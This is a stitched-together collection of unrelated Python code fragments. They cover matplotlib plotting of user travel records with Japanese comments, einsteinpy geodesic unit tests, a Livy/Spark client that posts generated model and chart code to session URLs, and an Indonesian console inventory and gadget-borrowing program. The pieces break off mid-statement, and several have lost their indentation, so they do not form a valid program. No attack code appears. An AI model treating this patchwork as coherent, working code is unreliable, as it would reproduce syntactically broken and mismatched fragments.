# set japanese font
font = {'family' : 'IPAexGothic'}
# set Thai font
# font = {'family' : 'Tahoma'}
# 入力される Country Nameが JPの時だけ VENUE_NAMEで出力するように対応
location_name_dictionary = {}
if (country == "JP"):
location_name_dictionary = location_name = get_venue_names_from_venue_ids([q['VENUE_ID'] for q in results])
location_name = ""
previous_venue = "0"
for q in results:
if q['VENUE_ID'] in location_name_dictionary:
location_name = location_name_dictionary[q['VENUE_ID']]
else:
location_name = q['VENUE_ID']
# 地図へ表示させる部分
axs[1].set_title('Travel Records of user '+ u[1],**font)
#C fllow number is mean Color in Tableau Colors
axs[1].plot(lngs, lats, '-o' 'C'+str(ranking_number) , markersize=6)
#place name in the map.
check_date = ""
check_category = ""
text_date = ""
text_time = ""
text_category = ""
text_plcename = ""
array_date =[]
array_time = []
array_category = []
array_location = []
set_y = 89
set_y_icon_h1 = 84.4
set_y_icon_h2 = 88.1
long_text = ""
for q in results :
if q['VENUE_ID'] in location_name_dictionary:
location_name2 = location_name_dictionary[q['VENUE_ID']]
else:
location_name2 = q['VENUE_ID']
axs[1].text(float(q['LONGITUDE']), float(q['LATITUDE']), location_name2, dict(size=10),**font)
check_date = q['DATE']
array_date.append(check_date.split(" ")[0])
array_time.append(check_date.split(" ")[1])
array_category.append(q['CATEGORY'])
array_location.append(location_name2)
text_date = check_date.split(" ")[0]
text_time = check_date.split(" ")[1]
check_category = q['CATEGORY']
text_category = q['CATEGORY']
text_plcename = location_name2
url = "https://matplotlib.org/"
#text of travel record by set y axis of graph
axs[2].text(1,set_y, "Date : " + text_date , size =8 , **font) #set_y = 89 , 81.95 , 74.9 , ...
set_y -= 2.25
axs[2].text(1,set_y, " " + text_plcename , size =8 , **font ) #set_y = 86.75 , 79.7 , 72.65 , ...
set_y -= 2.35
axs[2].text(1,set_y, " | |
import warnings
import astropy.units as u
import numpy as np
import pytest
from numpy.testing import assert_allclose
from einsteinpy.metric import Schwarzschild, Kerr, KerrNewman
from einsteinpy.coordinates import CartesianConversion
from einsteinpy.coordinates.utils import four_position, stacked_vec
from einsteinpy.geodesic import Geodesic
from einsteinpy import constant
# Numeric values of physical constants used throughout the tests below,
# taken from einsteinpy.constant (SI values per that module's naming).
_c = constant.c.value  # speed of light
_G = constant.G.value  # gravitational constant
_Cc = constant.coulombs_const.value  # Coulomb's constant
def test_str_repr():
    """Verify that ``str()`` and ``repr()`` of a Geodesic yield the same text."""
    coord_time, mass = 0., 1e25
    position = np.array([306., np.pi / 2, np.pi / 2])
    velocity = np.array([0., 0.01, 10.])
    metric = Schwarzschild(M=mass)
    # Build the stacked initial state vector from the covariant metric.
    cov_mat = metric.metric_covariant(four_position(coord_time, position))
    state = stacked_vec(cov_mat, coord_time, position, velocity, time_like=True)
    geod = Geodesic(
        metric=metric,
        init_vec=state,
        end_lambda=1.,
        step_size=0.4e-6
    )
    assert str(geod) == repr(geod)
@pytest.fixture()
def dummy_data():
    """Provide ``(metric, init_vec, end_lambda, step_size)`` for a small Earth-mass setup."""
    coord_time = 0.
    mass = 6e24
    position = np.array([130.0, np.pi / 2, -np.pi / 8])
    velocity = np.array([0.0, 0.0, 1900.0])
    metric = Schwarzschild(M=mass)
    cov_mat = metric.metric_covariant(four_position(coord_time, position))
    init_vec = stacked_vec(cov_mat, coord_time, position, velocity, time_like=True)
    # end_lambda and step_size chosen small so the integration is quick.
    return metric, init_vec, 0.002, 5e-8
def test_Geodesics_has_trajectory(dummy_data):
    """A constructed Geodesic must expose its computed path as a NumPy array."""
    metric, init_vec, end_lambda, step_size = dummy_data
    geo = Geodesic(
        metric=metric,
        init_vec=init_vec,
        end_lambda=end_lambda,
        step_size=step_size,
    )
    assert isinstance(geo.trajectory, np.ndarray)
@pytest.mark.parametrize(
    "x_vec, v_vec, t, M, end_lambda, step_size",
    [
        (
            np.array([306., np.pi / 2, np.pi / 2]),
            np.array([0., 0., 951.]),
            0.,
            4e24,
            0.002,
            0.5e-6,
        ),
        (
            np.array([1e3, 0.15, np.pi / 2]),
            np.array([0.1 * _c, 0.5e-5 * _c, 0.5e-4 * _c]),
            0.,
            5.972e24,
            0.0001,
            0.5e-6,
        ),
        (
            np.array([50e3, np.pi / 2, np.pi / 2]),
            np.array([0.1 * _c, 2e-7 * _c, 1e-5]),
            0.,
            5.972e24,
            0.001,
            5e-6,
        ),
    ],
)
def test_calculate_trajectory_schwarzschild(
    x_vec, v_vec, t, M, end_lambda, step_size
):
    """The four-velocity norm must stay 1 (time-like) along a Schwarzschild geodesic."""
    metric = Schwarzschild(M=M)
    cov_mat = metric.metric_covariant(four_position(t, x_vec))
    init_vec = stacked_vec(cov_mat, t, x_vec, v_vec, time_like=True)
    geod = Geodesic(
        metric=metric,
        init_vec=init_vec,
        end_lambda=end_lambda,
        step_size=step_size,
        return_cartesian=False,
    )
    # g_{kk} * (u^k)^2 summed over the diagonal gives the norm of the
    # four-velocity; rows hold (x^0..x^3, u^0..u^3).
    norms = np.array(
        [
            sum(
                metric.metric_covariant(step[:4])[k][k] * (step[4 + k] ** 2)
                for k in range(4)
            )
            for step in geod.trajectory
        ],
        dtype=float,
    )
    assert_allclose(norms, 1., 1e-4)
def test_calculate_trajectory2_schwarzschild():
    """Earth's orbit around the Sun: speed at aphelion must be ~29.29 km/s.

    Orbital data from https://en.wikipedia.org/wiki/Earth%27s_orbit
    """
    coord_time = 0.
    sun_mass = 1.989e30
    r_perihelion = 147.10e9
    v_perihelion = 30290
    x_vec = np.array([r_perihelion, np.pi / 2, 0])
    # Purely angular initial velocity at perihelion.
    v_vec = np.array([0.0, 0.0, v_perihelion / r_perihelion])
    metric = Schwarzschild(M=sun_mass)
    cov_mat = metric.metric_covariant(four_position(coord_time, x_vec))
    init_vec = stacked_vec(cov_mat, coord_time, x_vec, v_vec, time_like=True)
    one_year = 3.154e7
    geod = Geodesic(
        metric=metric,
        init_vec=init_vec,
        end_lambda=one_year,
        step_size=one_year / 2e3,
        return_cartesian=False,
    )
    path = geod.trajectory
    apex = np.argmax(path[:, 1])  # row where the radial coordinate peaks
    v_aphelion = (((path[apex][1] * path[apex][7]) * (u.m / u.s)).to(u.km / u.s)).value
    assert_allclose(v_aphelion, 29.29, rtol=0.01)
def test_calculate_trajectory3_schwarzschild():
    """Same orbit as ``test_calculate_trajectory2_schwarzschild`` but
    initialized from cartesian coordinates, with the result also checked
    in cartesian form."""
    coord_time = 0.
    sun_mass = 1.989e30
    r_peri = 147.10e9
    v_peri = 30290
    # Start at 45 degrees in the orbital plane, velocity tangential.
    sph_state = CartesianConversion(
        r_peri / np.sqrt(2),
        r_peri / np.sqrt(2),
        0.,
        -v_peri / np.sqrt(2),
        v_peri / np.sqrt(2),
        0.
    ).convert_spherical()
    metric = Schwarzschild(M=sun_mass)
    cov_mat = metric.metric_covariant(four_position(coord_time, sph_state[:3]))
    init_vec = stacked_vec(cov_mat, coord_time, sph_state[:3], sph_state[3:], time_like=True)
    one_year = 3.154e7
    geod = Geodesic(
        metric=metric,
        init_vec=init_vec,
        end_lambda=one_year,
        step_size=one_year / 2e3,
    )
    path = geod.trajectory
    # Cartesian radius per step; aphelion is where it peaks.
    radius = np.sqrt(path[:, 1] ** 2 + path[:, 2] ** 2 + path[:, 3] ** 2)
    apex = np.argmax(radius)
    speed = np.sqrt(path[apex, 5] ** 2 + path[apex, 6] ** 2 + path[apex, 7] ** 2)
    v_aphelion = ((speed * (u.m / u.s)).to(u.km / u.s)).value
    assert_allclose(v_aphelion, 29.29, rtol=0.01)
@pytest.mark.parametrize(
    "x_vec, v_vec, t, M, end_lambda, step_size, OdeMethodKwargs, return_cartesian",
    [
        (
            np.array([306., np.pi / 2, np.pi / 2]),
            np.array([0., 0.1, 951.]),
            0.,
            4e24,
            0.0002,
            0.3e-6,
            {"stepsize": 0.3e-6},
            True,
        ),
        (
            np.array([1e3, 0.15, np.pi / 2]),
            np.array([_c, 0.5e-5 * _c, 1e-4 * _c]),
            0.,
            5.972e24,
            0.0002,
            0.5e-6,
            {"stepsize": 0.5e-6},
            False,
        ),
    ],
)
def test_calculate_trajectory_iterator_schwarzschild(
    x_vec, v_vec, t, M, end_lambda, step_size, OdeMethodKwargs, return_cartesian
):
    """The step iterator must reproduce the eagerly computed trajectory."""
    metric = Schwarzschild(M=M)
    cov_mat = metric.metric_covariant(four_position(t, x_vec))
    init_vec = stacked_vec(cov_mat, t, x_vec, v_vec, time_like=True)
    geod = Geodesic(
        metric=metric,
        init_vec=init_vec,
        end_lambda=end_lambda,
        step_size=step_size,
        return_cartesian=return_cartesian,
    )
    eager = geod.trajectory
    step_iter = geod.calculate_trajectory_iterator(
        OdeMethodKwargs=OdeMethodKwargs, return_cartesian=return_cartesian
    )
    # Each yielded item is a pair; index 1 holds the state vector.
    first_steps = np.array([step[1] for _, step in zip(range(50), step_iter)])
    assert_allclose(eager[:50, :], first_steps, rtol=1e-10)
def test_calculate_trajectory_iterator_RuntimeWarning_schwarzschild():
    """Iterating far past the configured ``end_lambda`` must emit a warning.

    Fix: ``warnings.simplefilter("always")`` is applied inside the
    ``catch_warnings`` block.  Without it, Python's once-per-location
    warning registry can suppress a warning that an earlier test already
    triggered, leaving ``w`` empty and making the assertion flaky.
    """
    t = 0.
    M = 1e25
    x_vec = np.array([306., np.pi / 2, np.pi / 2])
    v_vec = np.array([0., 0.01, 10.])
    ms_cov = Schwarzschild(M=M)
    x_4vec = four_position(t, x_vec)
    ms_cov_mat = ms_cov.metric_covariant(x_4vec)
    init_vec = stacked_vec(ms_cov_mat, t, x_vec, v_vec, time_like=True)
    end_lambda = 1.
    stepsize = 0.4e-6
    OdeMethodKwargs = {"stepsize": stepsize}
    geod = Geodesic(
        metric=ms_cov,
        init_vec=init_vec,
        end_lambda=end_lambda,
        step_size=stepsize,
        return_cartesian=False
    )
    with warnings.catch_warnings(record=True) as w:
        # Ensure every warning is recorded, even ones already seen elsewhere.
        warnings.simplefilter("always")
        it = geod.calculate_trajectory_iterator(
            OdeMethodKwargs=OdeMethodKwargs,
        )
        # Drain enough steps to run past end_lambda and trigger the warning.
        for _, _ in zip(range(1000), it):
            pass
        assert len(w) >= 1
@pytest.mark.parametrize(
    "x_vec, v_vec, t, M, a, end_lambda, step_size",
    [
        (
            np.array([306., np.pi / 2.05, np.pi / 2]),
            np.array([0., 0., 951.]),
            0.,
            4e24,
            2e-3,
            0.001,
            0.5e-6,
        ),
        (
            np.array([1e3, 0.15, np.pi / 2]),
            np.array([0.1 * _c, 0.5e-5 * _c, 0.5e-4 * _c]),
            0.,
            5.972e24,
            2e-3,
            0.0001,
            0.5e-6,
        ),
        (
            np.array([50e3, np.pi / 2, np.pi / 2]),
            np.array([0.1 * _c, 2e-7 * _c, 1e-5]),
            0.,
            5.972e24,
            0.,
            0.001,
            5e-6,
        ),
    ],
)
def test_calculate_trajectory_kerr(
    x_vec, v_vec, t, M, a, end_lambda, step_size
):
    """The four-velocity norm must stay 1 (time-like) along a Kerr geodesic."""
    metric = Kerr(coords="BL", M=M, a=a)
    cov_mat = metric.metric_covariant(four_position(t, x_vec))
    init_vec = stacked_vec(cov_mat, t, x_vec, v_vec, time_like=True)
    geod = Geodesic(
        metric=metric,
        init_vec=init_vec,
        end_lambda=end_lambda,
        step_size=step_size,
        return_cartesian=False,
    )
    norms = []
    for step in geod.trajectory:
        g = metric.metric_covariant(step[:4])
        # Diagonal terms plus the Kerr t-phi cross term.
        norms.append(
            sum(g[k][k] * (step[4 + k] ** 2) for k in range(4))
            + 2 * g[0][3] * step[4] * step[7]
        )
    assert_allclose(np.array(norms, dtype=float), 1., 1e-4)
def test_calculate_trajectory3_kerr():
    """Earth's orbit around a non-spinning (a=0) Kerr sun, initialized from
    cartesian coordinates; aphelion speed must be ~29.29 km/s.

    Orbital data from https://en.wikipedia.org/wiki/Earth%27s_orbit
    """
    coord_time = 0.
    sun_mass = 1.989e30
    spin = 0.
    r_peri = 147.10e9
    v_peri = 30290
    # Start at 45 degrees in the orbital plane, velocity tangential.
    sph_state = CartesianConversion(
        r_peri / np.sqrt(2),
        r_peri / np.sqrt(2),
        0.,
        -v_peri / np.sqrt(2),
        v_peri / np.sqrt(2),
        0.
    ).convert_spherical()
    metric = Kerr(coords="BL", M=sun_mass, a=spin)
    cov_mat = metric.metric_covariant(four_position(coord_time, sph_state[:3]))
    init_vec = stacked_vec(cov_mat, coord_time, sph_state[:3], sph_state[3:], time_like=True)
    one_year = 3.154e7
    geod = Geodesic(
        metric=metric,
        init_vec=init_vec,
        end_lambda=one_year,
        step_size=one_year / 2e3,
    )
    path = geod.trajectory
    # Cartesian radius per step; aphelion is where it peaks.
    radius = np.sqrt(path[:, 1] ** 2 + path[:, 2] ** 2 + path[:, 3] ** 2)
    apex = np.argmax(radius)
    speed = np.sqrt(path[apex, 5] ** 2 + path[apex, 6] ** 2 + path[apex, 7] ** 2)
    v_aphelion = ((speed * (u.m / u.s)).to(u.km / u.s)).value
    assert_allclose(v_aphelion, 29.29, rtol=0.01)
@pytest.mark.parametrize(
    "x_vec, v_vec, t, M, a, end_lambda, step_size, OdeMethodKwargs, return_cartesian",
    [
        (
            np.array([306., np.pi / 2, np.pi / 2]),
            np.array([0., 0.1, 951.]),
            0.,
            4e24,
            2e-3,
            0.0003,
            0.3e-6,
            {"stepsize": 0.3e-6},
            True,
        ),
        (
            np.array([1e3, 0.15, np.pi / 2]),
            np.array([0.2 * _c, 0.5e-5 * _c, 1e-4 * _c]),
            0.,
            5.972e24,
            0.,
            0.0004,
            0.5e-6,
            {"stepsize": 0.5e-6},
            False,
        ),
    ],
)
def test_calculate_trajectory_iterator_kerr(
    x_vec, v_vec, t, M, a, end_lambda, step_size, OdeMethodKwargs, return_cartesian
):
    """The Kerr step iterator must reproduce the eagerly computed trajectory."""
    metric = Kerr(coords="BL", M=M, a=a)
    cov_mat = metric.metric_covariant(four_position(t, x_vec))
    init_vec = stacked_vec(cov_mat, t, x_vec, v_vec, time_like=True)
    geod = Geodesic(
        metric=metric,
        init_vec=init_vec,
        end_lambda=end_lambda,
        step_size=step_size,
        return_cartesian=return_cartesian,
    )
    eager = geod.trajectory
    step_iter = geod.calculate_trajectory_iterator(
        OdeMethodKwargs=OdeMethodKwargs, return_cartesian=return_cartesian
    )
    # Each yielded item is a pair; index 1 holds the state vector.
    first_steps = np.array([step[1] for _, step in zip(range(50), step_iter)])
    assert_allclose(eager[:50, :], first_steps, rtol=1e-10)
def test_calculate_trajectory_iterator_RuntimeWarning_kerr():
t = 0.
M = 1e25
a = 0.
x_vec = np.array([306., np.pi / 2, np.pi / 2])
v_vec = np.array([0., 0.01, 10.])
mk_cov = Kerr(coords="BL", M=M, a=a)
x_4vec = four_position(t, x_vec)
mk_cov_mat = mk_cov.metric_covariant(x_4vec)
init_vec = stacked_vec(mk_cov_mat, t, x_vec, v_vec, time_like=True)
end_lambda = 1.
stepsize = 0.4e-6
OdeMethodKwargs = {"stepsize": stepsize}
geod = Geodesic(
metric=mk_cov,
init_vec=init_vec,
end_lambda=end_lambda,
step_size=stepsize,
return_cartesian=False
)
with warnings.catch_warnings(record=True) as w:
it = geod.calculate_trajectory_iterator(
OdeMethodKwargs=OdeMethodKwargs,
)
for | |
train, test)
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-10'
self.ret_message['description'] = r.text
return self.ret_message
def decision_tree(self,
table_name,
features_col,
label_col,
prediction_col,
probability_col,
raw_prediction_col,
max_depth,
max_bins,
min_instances_per_node,
min_info_gain,
max_memory_in_mb,
cache_node_ids,
checkpoint_interval,
impurity,
seed, train, test,
user_id, livy_id):
t = Template()
code = t.decision_tree(table_name,
features_col,
label_col,
prediction_col,
probability_col,
raw_prediction_col,
max_depth,
max_bins,
min_instances_per_node,
min_info_gain,
max_memory_in_mb,
cache_node_ids,
checkpoint_interval,
impurity,
seed, train, test)
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-11'
self.ret_message['description'] = r.text
return self.ret_message
def naive_bayes(self,
table_name,
features_col,
label_col,
prediction_col,
thresholds,
probability_col,
raw_prediction_col,
smoothing,
weight_col,
model_type,
train, test,
user_id, livy_id):
t = Template()
code = t.naive_bayes(table_name, features_col, label_col, prediction_col, thresholds, probability_col, raw_prediction_col, smoothing, weight_col, model_type, train, test,)
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-10'
self.ret_message['description'] = r.text
return self.ret_message
def random_forest(self,
table_name,
features_col,
label_col,
prediction_col,
probability_col,
raw_prediction_col,
max_depth,
max_bins,
min_instances_per_node,
min_info_gain,
max_memory_in_mb,
cache_node_ids,
checkpoint_interval,
impurity,
num_trees,
feature_subset_strategy,
seed,
subsampling_rate,
train,test,
user_id, livy_id):
t = Template()
code = t.random_forest(table_name,
features_col,
label_col,
prediction_col,
probability_col,
raw_prediction_col,
max_depth,
max_bins,
min_instances_per_node,
min_info_gain,
max_memory_in_mb,
cache_node_ids,
checkpoint_interval,
impurity,
num_trees,
feature_subset_strategy,
seed,
subsampling_rate, train, test)
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-11'
self.ret_message['description'] = r.text
return self.ret_message
def fp_growth(self, table_name, splits, min_support, min_confidence, items_col, prediction_col, num_partitions, user_id, livy_id):
t = Template()
code = t.fp_growth(table_name, splits, min_support, min_confidence, items_col, prediction_col, num_partitions)
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-11'
self.ret_message['description'] = r.text
return self.ret_message
def linear_svc(self, table_name, features_col, label_col, prediction_col, max_iter, reg_param, tol, raw_prediction_col, fit_intercept, standardization, threshold, weight_col, aggregation_depth, train, test, user_id, livy_id):
t = Template()
code = t.linear_svc(table_name, features_col, label_col, prediction_col, max_iter, reg_param, tol, raw_prediction_col, fit_intercept, standardization, threshold, weight_col, aggregation_depth, train, test)
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-11'
self.ret_message['description'] = r.text
return self.ret_message
def arima(self, table_name, splits, numberofpredict, date_col, timeseries_col, start_p, d, start_q, max_p, max_d, max_q, start_P, D, start_Q, max_P, max_D, max_Q, max_order, m, seasonal, stationary, stepwise, solver, suppress_warnings, error_action, trace, scoring, business, by, user_id, livy_id):
t = Template()
code = t.arima(table_name, splits, numberofpredict, date_col, timeseries_col, start_p, d, start_q, max_p, max_d, max_q, start_P, D, start_Q, max_P, max_D, max_Q, max_order, m, seasonal, stationary, stepwise, solver, suppress_warnings, error_action, trace, scoring, business, by)
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-11'
self.ret_message['description'] = r.text
return self.ret_message
def get_pipeline_stages(self, user_id, livy_id):
t = Template()
code = t.get_pipeline_stages()
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-11'
self.ret_message['description'] = r.text
return self.ret_message
def save_model(self, session_name, file_name, stages, dataframe, user_id, livy_id):
t = Template()
code = t.save_model(session_name, file_name, stages, dataframe)
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-11'
self.ret_message['description'] = r.text
return self.ret_message
# def line_chart_visual(self, table_name, x, y, user_id, livy_id):
# t = Template()
# code = t.line_chart_visual(table_name, x, y)
# statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
# headers = {'Content-Type': 'application/json'}
# data = {"code": code}
# r = requests.post(statement_url, data=json.dumps(data), headers=headers)
# if str(r.status_code) == '201' or str(r.status_code) == '200':
# self.ret_message['code'] = self.ret_message['code']
# else:
# self.ret_message['code'] = 'livy-12'
# self.ret_message['description'] = r.text
# return self.ret_message
def line_chart_visual(self, table_name, x, y, user_id, livy_id):
t = Template()
code = t.line_chart_visual(table_name, x, y)
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-12'
self.ret_message['description'] = r.text
return self.ret_message
def bar_chart_visual(self, table_name, index, columns, agg, user_id, livy_id):
t = Template()
code = t.bar_chart_visual(table_name, index, columns, agg)
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-12'
self.ret_message['description'] = r.text
return self.ret_message
def pie_chart_visual(self, table_name, agg, values, user_id, livy_id):
t = Template()
code = t.pie_chart_visual(table_name, agg, values)
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-12'
self.ret_message['description'] = r.text
return self.ret_message
def histogram_chart_visual(self, table_name, x1, x2, user_id, livy_id):
t = Template()
code = t.histogram_chart_visual(table_name, x1, x2)
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-12'
self.ret_message['description'] = r.text
return self.ret_message
def violin_chart_visual(self, table_name, x, y, z, user_id, livy_id):
t = Template()
code = t.violin_chart_visual(table_name, x, y, z)
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-12'
self.ret_message['description'] = r.text
return self.ret_message
def scatter_chart_visual(self, table_name, x, y, z, category, user_id, livy_id):
t = Template()
code = t.scatter_chart_visual(table_name, x, y, z, category)
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-12'
self.ret_message['description'] = r.text
return self.ret_message
def decision_tree_visual(self, filled, roundedCorners, roundLeaves, user_id, livy_id):
t = Template()
code = t.decision_tree_visual(filled, roundedCorners, roundLeaves)
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-12'
self.ret_message['description'] = r.text | |
= input("Apakah anda yakin ingin menghapus " + gadget[urutan][1] + " (Y/N)? ")
# Validasi jawaban
while not validasiYN(jawaban):
jawaban = input("Apakah anda yakin ingin menghapus " + gadget[urutan][1] + " (Y/N)? ")
if jawaban == 'Y':
gadget.pop(urutan)
print()
print("Item telah berhasil dihapus dari database.")
else:
print("Item tidak jadi dihapus dari database")
rolling = False
else:
print("Tidak ada item dengan ID tersebut.")
elif ID[0] == 'C':
if IDItemAda(consumable,ID):
urutan = cariID(consumable,ID)
jawaban = input("Apakah anda yakin ingin menghapus " + consumable[urutan][1] + " (Y/N)? ")
# Validasi jawaban
while not validasiYN(jawaban):
jawaban = input("Apakah anda yakin ingin menghapus " + gadget[urutan][1] + " (Y/N)? ")
if jawaban == 'Y':
consumable.pop(urutan)
print()
print("Item telah berhasil dihapus dari database.")
else:
print("Item tidak jadi dihapus dari database")
rolling = False
else:
print("Tidak ada item dengan ID tersebut.")
else:
print("ID yang anda masukkan invalid, ID harus diawali dengan huruf C atau G")
# rolling == False
# ============================ F7 ========================================
def ubahjumlah():
    # Change the stock count of a gadget or consumable in the database.
    # I.S. (initial state) : gadget and consumable data matrices are defined
    # F.S. (final state)   : the item's stock count in the database is updated
    #
    # Fixes over the previous version:
    #   * bare ``except:`` (followed by a stray no-op ``ValueError`` expression)
    #     replaced with a proper ``except ValueError:`` so only bad numeric
    #     input is caught
    #   * empty ID input no longer raises IndexError on ``id_item[0]``
    #   * the "stock too low" message now reports abs(change), matching the
    #     success messages
    #   * the duplicated gadget/consumable branches are merged via an alias
    # KAMUS LOKAL (local dictionary)
    #   id_item : string
    #   before, change, indeks_found : integer
    #   data : alias to either the gadget or the consumable matrix
    # ALGORITMA
    id_item = input("Masukan ID: ")
    # Validate the amount: keep asking until a valid integer is typed.
    while True:
        try:
            change = int(input("Masukkan Jumlah: "))
            break
        except ValueError:
            print("Silahkan masukan kembali angka dengan benar")
            print()
    # Pick the matrix matching the ID prefix; [:1] is safe on an empty string.
    if id_item[:1] == 'G':
        data = gadget
    elif id_item[:1] == 'C':
        data = consumable
    else:
        print("Tidak ada item dengan ID tersebut!")
        return
    # Linear search for the item (row 0 is assumed to be the header row).
    indeks_found = None
    for i in range(1, len(data)):
        if data[i][0] == id_item:
            indeks_found = i
            break
    if indeks_found is None:
        print("Tidak ada item dengan ID tersebut!")
        return
    before = data[indeks_found][3]
    if before + change < 0:
        # Not enough stock to remove abs(change) items; leave stock untouched.
        print(f"{abs(change)} {data[indeks_found][1]} gagal dibuang karena stok kurang. Stok sekarang: {before} (< {abs(change)})")
    else:
        data[indeks_found][3] = before + change
        if change >= 0:
            print(f"{change} {data[indeks_found][1]} berhasil ditambahkan. Stok sekarang: {data[indeks_found][3]}")
        else:
            print(f"{abs(change)} {data[indeks_found][1]} berhasil dibuang. Stok sekarang: {data[indeks_found][3]}")
# ============================ F8 ========================================
def pinjam():
    # Borrow a gadget matching the entered id_item; decrements the gadget's
    # stock count and appends a new entry to gadget_borrow_history.
    # I.S. (initial state) : gadget and gadget_borrow_history matrices are defined
    # F.S. (final state)   : gadget stock decreased, new row in gadget_borrow_history
    # KAMUS LOKAL (local dictionary)
    #   id_item, id_peminjaman, data_string : string
    #   condition, found, syarat_terpenuhi_1, terms : boolean
    #   indeks, current_amount, amount, a : integer
    #   personal_borrow : array of string
    # ALGORITMA
    # Validate the item ID: loop until an existing gadget ID is entered.
    condition = True
    while condition:
        try:
            id_item = input("Masukan ID item: ")
            found = False
            # Row 0 is assumed to be the header row, hence range starts at 1.
            for i in range(1, len(gadget)):
                if gadget[i][0] == id_item:
                    found = True
                    condition = False
                    indeks = i
            if found == False:
                print("Tidak ada item dengan ID tersebut. Silahkan masukan kembali ID item yang sesuai")
                print()
        except ValueError:
            # NOTE(review): input() does not normally raise ValueError here;
            # this handler looks unreachable — verify intent.
            print()
    # Collect every borrow record belonging to the current user.
    personal_borrow = []
    for a in range(len(gadget_borrow_history)):
        if gadget_borrow_history[a][1] == idUser:
            personal_borrow.append(gadget_borrow_history[a])
    # The user may borrow only if they have fully returned this gadget before,
    # or have never borrowed it at all.
    # Condition 1: the most recent borrow of this gadget was fully returned
    # (scan newest to oldest; flag at column 5 marks "returned").
    syarat_terpenuhi_1 = False
    # NOTE(review): this range never examines index 0 of personal_borrow
    # (stop is 0, exclusive) — possible off-by-one; verify intent.
    for i in range(len(personal_borrow)-1, 0, -1):
        if personal_borrow[i][2] == id_item:
            if personal_borrow[i][5] == True:
                syarat_terpenuhi_1 = True
            break
    # Condition 2: the user has never borrowed this gadget at all.
